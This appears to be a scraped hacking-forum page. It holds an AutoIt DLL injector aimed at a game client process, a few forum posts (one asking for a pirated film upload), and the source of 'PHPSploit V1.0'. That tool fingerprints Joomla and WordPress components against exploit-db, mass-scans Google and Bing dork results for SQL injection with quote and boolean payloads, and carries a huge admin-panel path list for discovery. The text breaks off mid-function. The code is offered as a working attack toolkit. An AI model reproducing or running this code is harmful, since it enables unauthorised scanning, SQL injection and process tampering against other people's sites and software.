Sleep(10) Until $msg == $gui_event_close Func _message($errorcode) If $errorcode <> 0 Then MsgBox(16, "Dll Injector", "Fatal Error" & @CRLF & "Hata Kodu: " & @error) Else 
MsgBox(64, "TEST", "Inject Succesfull", 3) If WinWaitActive("Knight OnLine Client", "") Then Sleep(100) WinSetState("Direnish.net", "", @SW_HIDE) EndIf Exit EndIf EndFunc Func _injectdll($processid, $dllpath) If $processid == 0 Then Return SetError(1, "", False) If NOT (FileExists($dllpath)) Then Return SetError(2, "", False) If NOT (StringRight($dllpath, 4) == ".dll") Then Return SetError(3, "", False) $kernel32 = DllOpen("kernel32.dll") If @error Then Return SetError(4, "", False) $dll_path = DllStructCreate("char[255]") DllCall($kernel32, "DWORD", "GetFullPathNameA", "str", $dllpath, "DWORD", 255, "ptr", DllStructGetPtr($dll_path), "int", 0) If @error Then Return SetError(5, "", False) $hprocess = DllCall($kernel32, "DWORD", "OpenProcess", "DWORD", 2035711, "int", 0, "DWORD", $processid) If @error Then Return SetError(6, "", False) $hmodule = DllCall($kernel32, "DWORD", "GetModuleHandleA", "str", "kernel32.dll") If @error Then Return SetError(7, "", False) $lpstartaddress = DllCall($kernel32, "DWORD", "GetProcAddress", "DWORD", $hmodule[0], "str", "LoadLibraryA") If @error Then Return SetError(8, "", False) $lpparameter = DllCall($kernel32, "DWORD", "VirtualAllocEx", "int", $hprocess[0], "int", 0, "ULONG_PTR", DllStructGetSize($dll_path), "DWORD", 12288, "int", 4) If @error Then Return SetError(9, "", False) DllCall("kernel32.dll", "BOOL", "WriteProcessMemory", "int", $hprocess[0], "DWORD", $lpparameter[0], "str", DllStructGetData($dll_path, 1), "ULONG_PTR", DllStructGetSize($dll_path), "int", 0) If @error Then Return SetError(10, "", False) $hthread = DllCall($kernel32, "int", "CreateRemoteThread", "DWORD", $hprocess[0], "int", 0, "int", 0, "DWORD", $lpstartaddress[0], "DWORD", $lpparameter[0], "int", 0, "int", 0) If @error Then Return SetError(11, "", False) DllCall($kernel32, "BOOL", "CloseHandle", "DWORD", $hprocess[0]) DllClose($kernel32) Return SetError(0, "", True) EndFunc Exit
  19. Do you know what a PHPSploit is? Well, this is the source of a PHPSploit! If you know what it is, then you know what it does, what it is used for and how it is used!
  20. io.kent

    Proxy

    Updated!
  21. Who can upload the movie Riddick 3 in DVD-rip quality to YouTube!? Thank you!
  22. <?php set_time_limit(0); error_reporting(0); @ignore_user_abort(true); ini_set('memory_limit', '128M'); if(@$_GET['webvuln']) { //lagripp code function ask_exploit_db($component){ // ***65533;***65533;***65533;***65533; ***65533;***65533;***65533;***65533;***65533;***65533;***65533;***65533;***65533; ***65533;***65533;***65533;***65533; ***65533;***65533;***65533;***65533; ***65533;***65533;***65533;***65533;***65533;***65533;***65533; $ExPloiTdb ="http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$component&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve="; $result = @file_get_contents($ExPloiTdb); if (@eregi("No results",$result)) { echo"<td>Not Found</td><td><a href='http://www.google.com/search?hl=en&q=download+$component'>Download</a></td></tr>"; }else{ echo"<td><a href='$ExPloiTdb'>Found ..!</a></td><td><--</td></tr>"; } } /**************************************************************/ function get_components($site1){ // ***65533;***65533;***65533;***65533; ***65533;***65533;***65533;***65533;***65533;***65533;***65533;***65533; ***65533;***65533;***65533;***65533;***65533;***65533;***65533;***65533; ***65533;***65533; ***65533;***65533;***65533;***65533; ***65533;***65533;***65533;***65533;***65533;***65533; ***65533;***65533;***65533;***65533;***65533; $source = @file_get_contents($site1); preg_match_all('{option,(.*?)/}i',$source,$f); preg_match_all('{option=(.*?)(&|&|")}i',$source,$f2); preg_match_all('{/components/(.*?)/}i',$source,$f3); $arz=array_merge($f2[1],$f[1],$f3[1]); $coms=array(); if(count($arz)==0){ echo "<tr><td colspan=3>[~] Nothing Found ..! , Maybe there is some error site or option ... 
check it .</td></tr>";} foreach(array_unique($arz) as $x){ $coms[]=$x; } foreach($coms as $comm){ echo "<tr><td>$comm</td>"; ask_exploit_db($comm); } } /**************************************************************/ function get_plugins($site1){ // ***65533;***65533;***65533;***65533; ***65533;***65533;***65533;***65533;***65533;***65533;***65533;***65533; ***65533;***65533;***65533;***65533;***65533;***65533;***65533;***65533; ***65533;***65533; ***65533;***65533;***65533;***65533; ***65533;***65533;***65533;***65533;***65533;***65533; ***65533;***65533;***65533;***65533; ***65533;***65533;***65533;***65533; $source = @file_get_contents($site1); preg_match_all("#/plugins/(.*?)/#i", $source, $f); $plugins=array_unique($f[1]); if(count($plugins)==0){ echo "<tr><td colspan=3>[~] Nothing Found ..! , Maybe there is some error site or option ... check it .</td></tr>";} foreach($plugins as $plugin){ echo "<tr><td>$plugin</td>"; ask_exploit_db($plugin); } } /**************************************************************/ function t_header($site1){ // ***65533;***65533;***65533;***65533;***65533; ***65533;***65533;***65533;***65533;***65533;***65533; echo'<table align="center" border="1" width="50%" cellspacing="1" cellpadding="5">'; echo' <tr id="oo"> <td>Site : <a href="'.$site1.'">'.$site1.'</a></td> <td>Exploit-db</b></td> <td>Exploit it !</td> </tr> '; } //--------------fin gripp // Party vulnerability $site1=strip_tags(trim($_GET['webvuln'])); t_header($site1); $url_to_change = $site1; $www = 'www'; $position = strpos($url_to_change, $www); if ($position === false) { $site1 = str_replace("".$site1."", "www.".$site1."", $site1); } else { echo ''; } if($_GET['what'] == 'joomla') { echo get_components("http://".$site1); } elseif($_GET['what'] == 'wordpress') { echo get_plugins("http://".$site1); } } elseif($_GET['dork']) { //////////////// ICI POUR LES SITE SIMPLE SQLi seulement pour l'instant ?> <?php /* Google dork scanner * yepss... 
you know what this is * */ @error_reporting(0); @set_time_limit(60); function fetch($url) { if(!function_exists("curl_init")){ $bu = trim(@file_get_contents($url)); if($bu == "") return ""; else return $bu; } $header[] = "Accept-Language: en"; $header[] = "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"; $header[] = "Connection: Keep-Alive"; $header[] = "Pragma: no-cache"; $header[] = "Cache-Control: no-cache"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE ); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); curl_setopt($ch, CURLOPT_TIMEOUT, 7); curl_setopt($ch, CURLOPT_HTTPHEADER, $header); $content = curl_exec($ch); curl_close($ch); return $content; } function sqlcheck($url_){ // clean url $url_ = "http://".trim(str_ireplace("http://","",$url_)); $url_ = str_ireplace("&","&",$url_); $urls = explode("?",$url_); // check if url contains querystring if(count($urls)==2){ $url = $urls[0]; $querys = explode("&",$urls[1]); foreach($querys as $query){ $vars = explode("=",$query); //echo $query; // check if parameter has a numeric value if((count($vars)>=2) && (is_numeric($vars[1]))){ $final = str_replace($query,$query."%27",$url_); //echo $final; $content = fetch($final); $url_1 = file_get_contents($url_); $url_2 = file_get_contents($final); if(preg_match("/sql syntax|sql error|right syntax to use near|Warning|SQL|syntax error converting|unclosed quotation|is not a valid MySQL result/i",$content) OR ($url_1 !== $url_2)){ return $vars[0]; } } } } return ""; // gagal son } function sqlheavycheck($url_){ // clean url $url_ = "http://".trim(str_ireplace("http://","",$url_)); $url_ = str_ireplace("&","&",$url_); // check if url contains querystring $pos = stripos($url_,"?"); if($pos !== false){ $url = substr($url_,0,$pos); $que = substr($url_,$pos+1); $querys = explode("&",$que); foreach($querys as $query){ $vars = 
explode("=",$query); //echo $query; // check if parameter has a numeric value if((count($vars)>=2) && (is_numeric($vars[1]))){ // and 1=(select 1) $acak = rand(1111,9999); $final = str_replace($query,$query."%20AND%20".$acak."%3D%28SELECT%20".$acak."%29--",$url_); $contrue = fetch($final); //echo "final1 : ".$final."<br />"; // and 1=(select 0) $acak = rand(1111,9999); $final = str_replace($query,$query."%20AND%20".$acak."%3D%28SELECT%200%29--",$url_); //echo "final2 : ".$final."<br />"; $confalse = fetch($final); $numtrue = strlen(strip_tags($contrue)); $numfalse = strlen(strip_tags($confalse)); $selisih = $numtrue - $numfalse; if($selisih >= 30){ return $vars[0]; } else{ //' and 1=(select 1) and '1'='1 $acak = rand(1111,9999); $final = str_replace($query,$query."%27%20AND%20".$acak."%3D%28SELECT%20".$acak."%29%20AND%20%271%27=%271",$url_); $contrue = fetch($final); //echo "final1 : ".$final."<br />"; //' and 1=(select 0) and '1'='1 $acak = rand(1111,9999); $final = str_replace($query,$query."%27%20AND%20".$acak."%3D%28SELECT%200%29%20AND%20%271%27=%271",$url_); //echo "final2 : ".$final."<br />"; $confalse = fetch($final); $numtrue = strlen(strip_tags($contrue)); $numfalse = strlen(strip_tags($confalse)); $selisih = $numtrue - $numfalse; if($selisih >= 30){ return $vars[0]; } } } } } return ""; // gagal son... } // debugging tools if(isset($_GET['check'])&&($_GET['check']!="")){ $url = $_GET['check']; echo $url." ".sqlcheck($url); die(); } if(isset($_GET['heavycheck'])&&($_GET['heavycheck']!="")){ $url = $_GET['heavycheck']; echo $url." 
".sqlheavycheck($url); die(); } // debugging tools end if(isset($_GET['dork'])&&($_GET['dork']!="")){ $gnum = 10; // jumlah hasil pencarian perhalaman $setype = "google"; // default cari pakek g00gle if(isset($_GET['setype'])) $setype = strtolower(trim($_GET['setype'])); if(isset($_GET['page'])){ $gpage = (int) $_GET['page']; if($gpage < 1) $gpage = 1; } else $gpage = 1; $gpage = ($gpage - 1) * $gnum; if($gpage > ($gpage * $gnum)){ echo "_finish_|max only ".$gpage." results"; die(); } $dork = stripslashes($_GET['dork']); $dorkg = "site:".urldecode($dork)." filetype:php"; $dorkb = urldecode("site:".$dork."+php"); $dorkb = str_replace(" ","+",$dorkb); if($setype == "google"){ for($i=1; $i<3; $i++) { $gsearch = fetch("http://www.google.com/search?hl=fr&q=" . urlencode($dorkg) . "&start=$gpage"); $raws = explode("<h3 class=\"r\">",$gsearch); if((trim($gsearch) == "") || (count($raws) <= 1) || !(preg_match('/<h3 class="r"><a href="(.*?)"/si',$gsearch))){ echo "<font color=#ff0000>[X] ".$setype."</font>"; die(); } } } elseif($setype == "bing"){ for($i=1; $i<3; $i++) { $dork = preg_replace("/^[^:]*.*)/i","\\1",$dorkb); $gsearch = fetch("http://www.bing.com/search?q=".$dorkb."&filt=all&first=".$gpage."&FORM=PERE3"); $raws = explode("<div class=\"sb_tlst\"><h3>",$gsearch); if((trim($gsearch) == "") || (!preg_match("/class=\"sb_pagN\"/i",$gsearch)) || (count($raws) <= 1)){ echo "<font color=#ff0000>[X] ".$setype."</font>"; die(); } } } else{ echo "Search engine not supported"; die(); } foreach($raws as $korban){ if(strlen($korban) >= 9 && (substr($korban,0,9)=="<a href=\"")){ $heavy = false; if((isset($_GET['heavy'])) && ($_GET['heavy']=='1')) $heavy = true; $calon = substr($korban,9); $pos = strpos($calon,"\""); if($pos !== false){ $url = trim(substr($calon,0,$pos)); if(preg_match("/facebook\.|yahoo\.|google\.|youtube\./i",$url)) continue; if(!preg_match("/\w+=\d+/i",$url)) continue; if($heavy) { $vulnvar = sqlheavycheck($url); if($vulnvar != "") $laporan = "<a 
href=\"".$url."\" target=\"_".rand(1111,9999)."\"><span class=\"white\">".$url."</span><span class=\"red\"> @ </span><span class=\"white\">".$vulnvar."</span></a><br />"; else $laporan = "<a href=\"".$url."\" target=\"_".rand(1111,9999)."\">".$url."</a><br />"; echo $laporan; } else{ $vulnvar = sqlcheck($url); if($vulnvar != "") $laporan = "<a href=\"".$url."\" target=\"_".rand(1111,9999)."\"><span class=\"white\">".$url."</span><span class=\"red\"> @ </span><span class=\"white\">".$vulnvar."</span></a><br />"; else $laporan = "<a href=\"".$url."\" target=\"_".rand(1111,9999)."\">".$url."</a><br />"; echo $laporan; } } } } die(); // mas kamu koq looyo... } } else { $list['front'] ="admin team adm admincp admcp cp modcp moderatorcp adminare admins cpanel controlpanel"; $list['end'] = "admin1.php team admin1.html admin2.php admin2.html yonetim.php yonetim.html yonetici.php yonetici.html ccms/ upload.php ccms/login.php ccms/index.php maintenance/ webmaster/ adm/ configuration/ configure/ websvn/ admin/ admin/account.php admin/account.html admin/index.php admin/index.html admin/login.php admin/login.html admin/home.php admin/controlpanel.html admin/controlpanel.php admin.php admin.html admin/cp.php admin/cp.html cp.php cp.html administrator/ administrator/index.html administrator/index.php administrator/login.html administrator/login.php administrator/account.html administrator/account.php administrator.php administrator.html login.php login.html modelsearch/login.php moderator.php moderator.html moderator/login.php moderator/login.html moderator/admin.php moderator/admin.html moderator/ account.php account.html controlpanel/ controlpanel.php controlpanel.html admincontrol.php admincontrol.html adminpanel.php adminpanel.html admin1.asp admin2.asp yonetim.asp yonetici.asp admin/account.asp admin/index.asp admin/login.asp admin/home.asp admin/controlpanel.asp admin.asp admin/cp.asp cp.asp administrator/index.asp administrator/login.asp administrator/account.asp 
administrator.asp login.asp modelsearch/login.asp moderator.asp moderator/login.asp moderator/admin.asp account.asp controlpanel.asp admincontrol.asp adminpanel.asp fileadmin/ fileadmin.php fileadmin.asp fileadmin.html administration/ administration.php administration.html sysadmin.php sysadmin.html phpMyAdmin/ phpmyadmin/ PMA/ admin/ dbadmin/ mysql/ myadmin/ phpmyadmin2/ phpMyAdmin2/ phpMyAdmin-2/ php-my-admin/ weMeanYouNoHarm/ V20xRmRRPT0K/ admin/pma/ admin/phpmyadmin/ db/ myadmin/ mysql/ mysqladmin/ typo3/phpmyadmin/ phpadmin/ phpmyadmin1/ web/phpMyAdmin/ xampp/phpmyadmin/ web/ php-my-admin/ websql/ phpMyAdmin-2/ php-my-admin/ phpMyAdmin-2.8.2.1/ phpMyAdmin-2.8.2.2/ phpMyAdmin-2.8.2.3/ phpMyAdmin-2.8.2.4/ phpMyAdmin-2.10.0.0/ phpMyAdmin-2.10.0.1/ phpMyAdmin-2.10.0.2/ phpMyAdmin-2.10.1.0/ phpMyAdmin-2.10.2.0/ phpMyAdmin-2.11.0.0/ phpMyAdmin-2.11.1.0/ phpMyAdmin-2.11.1.1/ phpMyAdmin-2.11.1.2/ phpMyAdmin-2.11.2.0/ phpMyAdmin-2.11.2.1/ phpMyAdmin-2.11.2.2/ phpMyAdmin-2.11.3.0/ phpMyAdmin-2.11.4.0/ phpMyAdmin-2.11.5.0/ phpMyAdmin-2.11.5.1/ phpMyAdmin-2.11.5.2/ phpMyAdmin-2.11.6.0/ phpMyAdmin-2.11.7.0/ phpMyAdmin-2.11.7.1/ phpMyAdmin-2.11.8.0/ phpMyAdmin-2.11.9.0/ phpMyAdmin-2.11.9.1/ phpMyAdmin-2.11.9.2/ phpMyAdmin-2.11.9.3/ phpMyAdmin-2.11.9.4/ phpMyAdmin-3.0.0.0/ phpMyAdmin-3.0.1.0/ phpMyAdmin-3.0.1.1/ phpMyAdmin-3.0.2.0/ phpMyAdmin-3.1.0.0/ phpMyAdmin-3.1.1.0/ phpMyAdmin-3.1.2.0/ phpMyAdmin-3.1.3.0/ phpMyAdmin-2.9.0-rc1/ phpMyAdmin-2.9.0/ phpMyAdmin-2.9.0.1/ phpMyAdmin-2.9.0.2/ phpMyAdmin-2.9.1/ phpMyAdmin-2.9.2/ phpMyAdmin-3.4.3.1-all-languages/ phpMyAdmin-3.4.3.1-english/ phpMyAdmin-3.4.3.1/ sqlmanager/ mysqlmanager/ p/m/a/ PMA2005/ pma2005/ pma2006/ pma2007/ pma2008/ pma2009/ phpmanager/ php-myadmin/ phpmy-admin/ webadmin/ sqlweb/ websql/ webdb/ mysqladmin/ mysql-admin/ databaseadmin/ admm/ admn/ w00tw00t.at.blackhats.romanian.anti-sec:)/ phpMyAdmin/scripts/setup.php/ phpmyadmin/scripts/setup.php/ pma/scripts/setup.php/ myadmin/scripts/setup.php/ 
MyAdmin/scripts/setup.php/ phpmyadmin/scripts/setup.php/ phpMyAdmin/scripts/setup.php/ phpMyAdmin-2.2.3/ phpMyAdmin-2.2.6/ phpMyAdmin-2.5.1/ phpMyAdmin-2.5.4/ phpMyAdmin-2.5.5-rc1/ phpMyAdmin-2.5.5-rc2/ phpMyAdmin-2.5.5/ phpMyAdmin-2.5.5-pl1/ phpMyAdmin-2.5.6-rc1/ phpMyAdmin-2.5.6-rc2/ phpMyAdmin-2.5.6/ phpMyAdmin-2.5.7/ phpMyAdmin-2.5.7-pl1/ phpMyAdmin-2.6.0-alpha/ phpMyAdmin-2.6.0-alpha2/ phpMyAdmin-2.6.0-beta1/ phpMyAdmin-2.6.0-beta2/ phpMyAdmin-2.6.0-rc1/ phpMyAdmin-2.6.0-rc2/ phpMyAdmin-2.6.0-rc3/ phpMyAdmin-2.6.0/ phpMyAdmin-2.6.0-pl1/ phpMyAdmin-2.6.0-pl2/ phpMyAdmin-2.6.0-pl3/ phpMyAdmin-2.6.1-rc1/ phpMyAdmin-2.6.1-rc2/ phpMyAdmin-2.6.1/ phpMyAdmin-2.6.1-pl1/ phpMyAdmin-2.6.1-pl2/ phpMyAdmin-2.6.1-pl3/ phpMyAdmin-2.6.2-rc1/ phpMyAdmin-2.6.2-beta1/ phpMyAdmin-2.6.2-rc1/ phpMyAdmin-2.6.2/ phpMyAdmin-2.6.2-pl1/ phpMyAdmin-2.6.3/ phpMyAdmin-2.6.3-rc1/ phpMyAdmin-2.6.3/ phpMyAdmin-2.6.3-pl1/ phpMyAdmin-2.6.4-rc1/ phpMyAdmin-2.6.4-pl1/ phpMyAdmin-2.6.4-pl2/ phpMyAdmin-2.6.4-pl3/ phpMyAdmin-2.6.4-pl4/ phpMyAdmin-2.6.4/ phpMyAdmin-2.7.0-beta1/ phpMyAdmin-2.7.0-rc1/ phpMyAdmin-2.7.0-pl1/ phpMyAdmin-2.7.0-pl2/ phpMyAdmin-2.7.0/ phpMyAdmin-2.8.0-beta1/ phpMyAdmin-2.8.0-rc1/ phpMyAdmin-2.8.0-rc2/ phpMyAdmin-2.8.0/ phpMyAdmin-2.8.0.1/ phpMyAdmin-2.8.0.2/ phpMyAdmin-2.8.0.3/ phpMyAdmin-2.8.0.4/ phpMyAdmin-2.8.1-rc1/ phpMyAdmin-2.8.1/ phpMyAdmin-2.8.2/ sqlmanager/ mysqlmanager/ p/m/a/ PMA2005/ pma2005/ phpmanager/ php-myadmin/ phpmy-admin/ webadmin/ sqlweb/ websql/ webdb/ mysqladmin/ mysql-admin/ myadmin/ sysadmin.asp sysadmin/ ur-admin.asp ur-admin.php ur-admin.html ur-admin/ Server.php Server.html Server.asp Server/ wp-admin/ administr8.php administr8.html administr8/ administr8.asp webadmin/ webadmin.php webadmin.asp webadmin.html administratie/ admins/ admins.php admins.asp admins.html administrivia/ Database_Administration/ WebAdmin/ useradmin/ sysadmins/ admin1/ system-administration/ administrators/ pgadmin/ directadmin/ staradmin/ ServerAdministrator/ SysAdmin/ 
administer/ LiveUser_Admin/ sys-admin/ typo3/ panel/ cpanel/ cPanel/ cpanel_file/ platz_login/ rcLogin/ blogindex/ formslogin/ autologin/ support_login/ meta_login/ manuallogin/ simpleLogin/ loginflat/ utility_login/ showlogin/ memlogin/ members/ login-redirect/ sub-login/ wp-login/ login1/ dir-login/ login_db/ xlogin/ smblogin/ customer_login/ UserLogin/ login-us/ acct_login/ admin_area/ bigadmin/ project-admins/ phppgadmin/ pureadmin/ sql-admin/ radmind/ openvpnadmin/ wizmysqladmin/ vadmind/ ezsqliteadmin/ hpwebjetadmin/ newsadmin/ adminpro/ Lotus_Domino_Admin/ bbadmin/ vmailadmin/ Indy_admin/ ccp14admin/ irc-macadmin/ banneradmin/ sshadmin/ phpldapadmin/ macadmin/ administratoraccounts/ admin4_account/ admin4_colon/ radmind-1/ Super-Admin/ AdminTools/ cmsadmin/ SysAdmin2/ globes_admin/ cadmins/ phpSQLiteAdmin/ navSiteAdmin/ server_admin_small/ logo_sysadmin/ server/ database_administration/ power_user/ system_administration/ ss_vms_admin_sm/ adminarea/ bb-admin/ adminLogin/ panel-administracion/ instadmin/ memberadmin/ administratorlogin/ admin/admin.php admin_area/admin.php admin_area/login.php siteadmin/login.php siteadmin/index.php siteadmin/login.html admin/admin.html admin_area/index.php bb-admin/index.php bb-admin/login.php bb-admin/admin.php admin_area/login.html admin_area/index.html admincp/index.asp admincp/login.asp admincp/index.html webadmin/index.html webadmin/admin.html webadmin/login.html admin/admin_login.html admin_login.html panel-administracion/login.html nsw/admin/login.php webadmin/login.php admin/admin_login.php admin_login.php admin_area/admin.html pages/admin/admin-login.php admin/admin-login.php admin-login.php bb-admin/index.html bb-admin/login.html bb-admin/admin.html admin/home.html pages/admin/admin-login.html admin/admin-login.html admin-login.html admin/adminLogin.html adminLogin.html home.html rcjakar/admin/login.php adminarea/index.html adminarea/admin.html webadmin/index.php webadmin/admin.php user.html modelsearch/login.html 
adminarea/login.html panel-administracion/index.html panel-administracion/admin.html modelsearch/index.html modelsearch/admin.html admincontrol/login.html adm/index.html adm.html user.php panel-administracion/login.php wp-login.php adminLogin.php admin/adminLogin.php home.php adminarea/index.php adminarea/admin.php adminarea/login.php panel-administracion/index.php panel-administracion/admin.php modelsearch/index.php modelsearch/admin.php admincontrol/login.php adm/admloginuser.php admloginuser.php admin2/login.php admin2/index.php adm/index.php adm.php affiliate.php adm_auth.php memberadmin.php administratorlogin.php admin/admin.asp admin_area/admin.asp admin_area/login.asp admin_area/index.asp bb-admin/index.asp bb-admin/login.asp bb-admin/admin.asp pages/admin/admin-login.asp admin/admin-login.asp admin-login.asp user.asp webadmin/index.asp webadmin/admin.asp webadmin/login.asp admin/admin_login.asp admin_login.asp panel-administracion/login.asp adminLogin.asp admin/adminLogin.asp home.asp adminarea/index.asp adminarea/admin.asp adminarea/login.asp panel-administracion/index.asp panel-administracion/admin.asp modelsearch/index.asp modelsearch/admin.asp admincontrol/login.asp adm/admloginuser.asp admloginuser.asp admin2/login.asp admin2/index.asp adm/index.asp adm.asp affiliate.asp adm_auth.asp memberadmin.asp administratorlogin.asp siteadmin/login.asp siteadmin/index.asp ADMIN/ paneldecontrol/ login/ cms/ admon/ ADMON/ administrador/ ADMIN/login.php panelc/ ADMIN/login.html admin.php login.htm login.html login/ login.php adm/ admin/ admin/account.html admin/login.html admin/login.htm admin/home.php admin/controlpanel.html admin/controlpanel.htm admin/cp.php admin/adminLogin.html admin/adminLogin.htm admin/admin_login.php admin/controlpanel.php admin/admin-login.php admin-login.php admin/account.php admin/admin.php admin.htm admin.html adminitem/ adminitem.php adminitems/ adminitems.php administrator/ administrator/login.php administrator.php administration/ 
administration.php adminLogin/ adminlogin.php admin_area/admin.php admin_area/ admin_area/login.php manager/ manager.php letmein/ letmein.php superuser/ superuser.php access/ access.php sysadm/ sysadm.php superman/ supervisor/ panel.php control/ control.php member/ member.php members/ members.php user/ user.php cp/ uvpanel/ manage/ manage.php management/ management.php signin/ signin.php log-in/ log-in.php log_in/ log_in.php sign_in/ sign_in.php sign-in/ sign-in.php users/ users.php accounts/ accounts.php wp-login.php bb-admin/login.php bb-admin/admin.php bb-admin/admin.html administrator/account.php relogin.htm relogin.html check.php relogin.php processlogin.php checklogin.php checkuser.php checkadmin.php isadmin.php authenticate.php authentication.php auth.php authuser.php authadmin.php cp.php modelsearch/login.php moderator.php moderator/ controlpanel/ controlpanel.php admincontrol.php adminpanel.php fileadmin/ fileadmin.php sysadmin.php admin1.php admin1.html admin1.htm admin2.php admin2.html yonetim.php yonetim.html yonetici.php yonetici.html phpmyadmin/ myadmin/ ur-admin.php ur-admin/ Server.php Server/ wp-admin/ administr8.php administr8/ webadmin/ webadmin.php administratie/ admins/ admins.php administrivia/ Database_Administration/ useradmin/ sysadmins/ admin1/ system-administration/ administrators/ pgadmin/ directadmin/ staradmin/ ServerAdministrator/ SysAdmin/ administer/ LiveUser_Admin/ sys-admin/ typo3/ panel/ cpanel/ cpanel_file/ platz_login/ rcLogin/ blogindex/ formslogin/ autologin/ support_login/ meta_login/ manuallogin/ simpleLogin/ loginflat/ utility_login/ showlogin/ memlogin/ login-redirect/ sub-login/ wp-login/ login1/ dir-login/ login_db/ xlogin/ smblogin/ customer_login/ UserLogin/ login-us/ acct_login/ bigadmin/ project-admins/ phppgadmin/ pureadmin/ sql-admin/ radmind/ openvpnadmin/ wizmysqladmin/ vadmind/ ezsqliteadmin/ hpwebjetadmin/ newsadmin/ adminpro/ Lotus_Domino_Admin/ bbadmin/ vmailadmin/ Indy_admin/ ccp14admin/ irc-macadmin/ 
banneradmin/ sshadmin/ phpldapadmin/ macadmin/ administratoraccounts/ admin4_account/ admin4_colon/ radmind-1/ Super-Admin/ AdminTools/ cmsadmin/ SysAdmin2/ globes_admin/ cadmins/ phpSQLiteAdmin/ navSiteAdmin/ server_admin_small/ logo_sysadmin/ power_user/ system_administration/ ss_vms_admin_sm/ bb-admin/ panel-administracion/ instadmin/ memberadmin/ administratorlogin/ adm.php admin_login.php panel-administracion/login.php pages/admin/admin-login.php pages/admin/ acceso.php admincp/login.php admincp/ adminarea/ admincontrol/ affiliate.php adm_auth.php memberadmin.php administratorlogin.php modules/admin/ administrators.php siteadmin/ siteadmin.php adminsite/ kpanel/ vorod/ vorod.php vorud/ vorud.php adminpanel/ PSUser/ secure/ webmaster/ webmaster.php autologin.php userlogin.php admin_area.php cmsadmin.php security/ usr/ root/ secret/ admin/login.php admin/adminLogin.php moderator.php moderator.html moderator/login.php moderator/admin.php yonetici.php 0admin/ 0manager/ aadmin/ cgi-bin/login.php login1.php login_admin/ login_admin.php login_out/ login_out.php login_user.php loginerror/ loginok/ loginsave/ loginsuper/ loginsuper.php login.php logout/ logout.php secrets/ super1/ super1.php super_index.php super_login.php supermanager.php superman.php superuser.php supervise/ supervise/Login.php super.php"; function template() { echo ' <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta **********="Content-Type" *********"text/html; charset=utf-8" /> <title>PHPSploit V1.0 Decoded By MegaBedder</title> <style type="text/css"> h1.technique-two { width: 405px; height: 120px; margin: 0 auto; } body{ background: #070707; background-image: url("http://www.easy-upload.net/fichiers/stalker-21-stalccccccker-jeux-video.20111184848.jpg");; margin: 0; padding: 0; background-attachment:fixed; color: #FFF; font-family: Calibri; font-size: 13px; } a{ color: 
#FFF; text-decoration: none; font-weight: bold; } .wrapper{ width: 1000px; margin: 0 auto; } .tube{ padding: 10px; } .red{ width: 490px; border: 1px solid #555; background: #333; color: #FFF } .red input{ background: #000; border: 1px solid #555; color: #FFF; } .blue{ float: left; width: 500px; border: 1px solid #1d7fc3; background: #191919; color: #1d7fc3; } .yellow{ position:absolute; margin-left: 510px; float: right; width: 480px; border: 1px solid #FFBF00; background: #191919; color: #FFBF00; } .green{ float: left; width: 490px; border: 1px solid #5fd419; background: #191919; color: #5fd419; } input,select,textarea{ border:0; border:1px solid #900; color:#fff; background:#000; margin:0; padding:2px 4px; } input:hover,textarea:hover,select:hover{ background:#200; border:1px solid #f00; } option{ background:#000; } .white{ color:#fff; } #status{ width:100%; height:auto; padding:4px 0; border-bottom:1px solid #300; } #result a{ color:#777; } .sign{ color:#222; } #box{ margin:10px 0 0 0; } </style> <script type="text/javascript"> <!-- function insertcode($text, $place, $replace) { var $this = $text; var logbox = document.getElementById($place); if($replace == 0) document.getElementById($place).innerHTML = logbox.innerHTML+$this; else document.getElementById($place).innerHTML = $this; //document.getElementById("helpbox").innerHTML = $this; } --> </script> <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>'; ?> <!-- <?php echo date("Y",time()); ?> Revan Aditya --> <script type="text/javascript"> jalan = false; nomer = 1; nomermax = 100; heavy = false; function ajax(vars, nom, cbFunction){ var req = window.XMLHttpRequest ? new XMLHttpRequest() : new ActiveXObject("MSXML2.XMLHTTP.3.0"); var querystring = '?' 
+ vars + '&page=' + nom; req.open("GET", querystring , true); req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); req.onreadystatechange = function(){ if (req.readyState == 4 && req.status == 200){ if (req.responseText){ cbFunction(req.responseText,vars); } } } req.send(null); } function showResult(str, vars){ var box = document.getElementById("result") if(str.match(/Warning|Fatal/gi)) box.innerHTML += '<span class=\"red\">*** </span> error...<br />'; else box.innerHTML += str; if(!jalan){ box.innerHTML += '<span class=\"red\">*** </span> paused...<br />'; document.getElementById("loading").style.visibility = 'hidden'; document.getElementById("btnOk").value = "Resume"; } else { if(!str.match(/.*finish.*/gi)){ sqlCheck(vars); } else{ var pesan = str.substring(str.indexOf("|") + 1); box.innerHTML = '<span class=\"red\">*** </span> finish ( ' + pesan + ' )<br />'; document.getElementById('setype').disabled = false; document.getElementById('dork').readOnly = false; document.getElementById("loading").style.visibility = 'hidden'; document.getElementById("btnOk").value = "Search"; nomer = 1; jalan = false; } } var oldYPos = 0, newYPos = 0; do{ if (document.all){ oldYPos = document.body.scrollTop; } else{ oldYPos = window.pageYOffset; } window.scrollBy(0, 50); if (document.all){ newYPos = document.body.scrollTop; } else{ newYPos = window.pageYOffset; } } while (oldYPos < newYPos); } function keyHandler(ev){ if (!ev){ ev = window.event; } if (ev.which){ keycode = ev.which; } else if (ev.keyCode){ keycode = ev.keyCode; } if (keycode == 13){ sikat(); } } String.prototype.trim = function() { return this.replace(/^\s*|\s*$/g, ""); } function sqlCheck(xdata){ if(jalan){ ajax(xdata, nomer, showResult); nomer++; } } function sqlHeavyCheck(xdata){ if(jalan){ ajax(xdata + '&heavy=1', nomer, showResult); nomer++; } } function sikat(){ var btext = document.getElementById("btnOk"); if((btext.value == 'Search') || (btext.value == 'Resume')){ if(!jalan){ 
